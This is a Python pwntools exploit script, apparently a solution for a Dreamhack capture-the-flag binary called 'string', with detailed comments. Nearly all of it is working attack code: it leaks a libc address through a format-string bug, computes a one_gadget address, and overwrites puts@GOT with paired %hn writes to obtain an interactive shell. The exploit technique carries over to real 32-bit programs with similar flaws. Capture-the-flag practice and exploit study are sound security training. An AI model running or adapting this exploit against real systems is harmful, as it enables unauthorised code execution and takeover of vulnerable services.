#!/usr/bin/env python3
from pwn import *
import re
# Open gdb in a tmux split when gdb.attach() is called further down; the
# pwntools log level is left at its default (uncomment to trace every byte).
context.terminal = ["tmux", "splitw"]
# context.log_level = "debug"

e = ELF("./string")

# Remote target, kept commented while developing against the local service.
HOST = "127.0.0.1"
PORT = 12345
# HOST = "host1.dreamhack.games"
# PORT = 23936

# Run the binary under the challenge's own libc so the hard-coded libc
# offsets used later match what is actually mapped. argv[1] is the binary's
# own path — presumably the program expects one argument; confirm against
# the target before changing it.
conn = process([e.path] * 2, env={"LD_PRELOAD": "./libc.so.6"})
# conn = remote(HOST, PORT)
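def fms(value, offset):
    """Build one ``%<value>c%<offset>$hn`` format-string write primitive.

    ``value`` is the width handed to ``%c`` (so printf's running character
    count reaches the 16-bit value you want stored) and ``offset`` is the
    positional stack argument that holds the target pointer. Returns bytes
    ready to append to the payload.

    The caller keeps ``value`` in 1..0xffff: ``%0c`` still prints one
    character, and a negative ``value`` is emitted verbatim, where printf
    reads the leading ``-`` as the left-justify flag rather than as part of
    the width.
    """
    return f"%{value}c%{offset}$hn".encode("utf8")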
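# Distance from the pointer leaked at %71$p to the libc base, and the
# one_gadget inside that libc. Both are build-specific and were taken for the
# ./libc.so.6 shipped with the challenge (0x18637 looks like
# __libc_start_main+247 on a 32-bit glibc 2.23 — verify against the libc you
# actually run before trusting the arithmetic below).
libc_offset = 0x18637
one_gadget_offset = 0x3a812

# Step 1: leak a libc pointer. Option 1 stores our string and option 2 feeds
# it to printf, so "%71$p" echoes the 71st positional argument back to us.
conn.sendlineafter("> ", "1\n%71$p")
conn.sendlineafter("> ", "2")
if not isinstance(conn, process):
    # Per the author's note the remote service sends one extra chunk before
    # the leak; drain it so the regex below sees the pointer.
    conn.recv()
leak = conn.recv(timeout=0.5)
match = re.search(rb"0[xX][0-9a-fA-F]+", leak)
if match is None:
    # Fail loudly instead of an AttributeError on None.group().
    raise RuntimeError(f"no pointer found in leak output: {leak!r}")
libc_start_main = int(match.group(), 16)
libc_addr = libc_start_main - libc_offset
if libc_addr & 0xFFF:
    # A mapped libc is page aligned; a misaligned base means libc_offset (or
    # the %71$p slot) does not match this build, so stop before corrupting
    # the GOT with a bogus address.
    raise RuntimeError(f"libc base {libc_addr:#x} is not page aligned")
one_gadget = libc_addr + one_gadget_offset
print(hex(libc_addr))
print(hex(one_gadget))

# Step 2: overwrite puts@GOT with the one_gadget using two %hn writes.
# The two target pointers come first so they sit at positional arguments
# 5 and 6 (the input buffer is assumed to start at argument 5 — confirm in
# gdb if the write lands elsewhere). Non-PIE 32-bit GOT addresses contain
# no NUL bytes, which is what keeps printf reading past them.
hi = (one_gadget >> 16) & 0xFFFF
lo = one_gadget & 0xFFFF
payload = p32(e.got["puts"] + 2)   # upper halfword, written via %5$hn
payload += p32(e.got["puts"])      # lower halfword, written via %6$hn
already_written = len(payload)     # 8 raw bytes printf has already counted
# %hn stores printf's running character count mod 2^16, so each padding is
# the gap from the current count to the desired halfword, taken mod 0x10000.
# The earlier `hi - lo` form only worked when lo > hi, where the negative
# width was accidentally parsed as the `-` flag with the right magnitude;
# for lo < hi it stored 2*hi - lo instead. %0c still prints one character,
# so a zero gap is expressed as a full 65536-character wrap.
pad_hi = (hi - already_written) % 0x10000 or 0x10000
payload += fms(pad_hi, 5)
pad_lo = (lo - hi) % 0x10000 or 0x10000
payload += fms(pad_lo, 6)
conn.sendline("1")
conn.sendlineafter("Input: ", payload)
# Option 2 calls puts on the stored string; puts@GOT now points at the gadget.
conn.sendlineafter(b"> ", "2")
if isinstance(conn, process):
    # gdb can only attach to a local process. Kept after the trigger as in
    # the original; move it before the final sendlineafter to break on the
    # overwritten puts call instead.
    gdb.attach(conn)
conn.interactive()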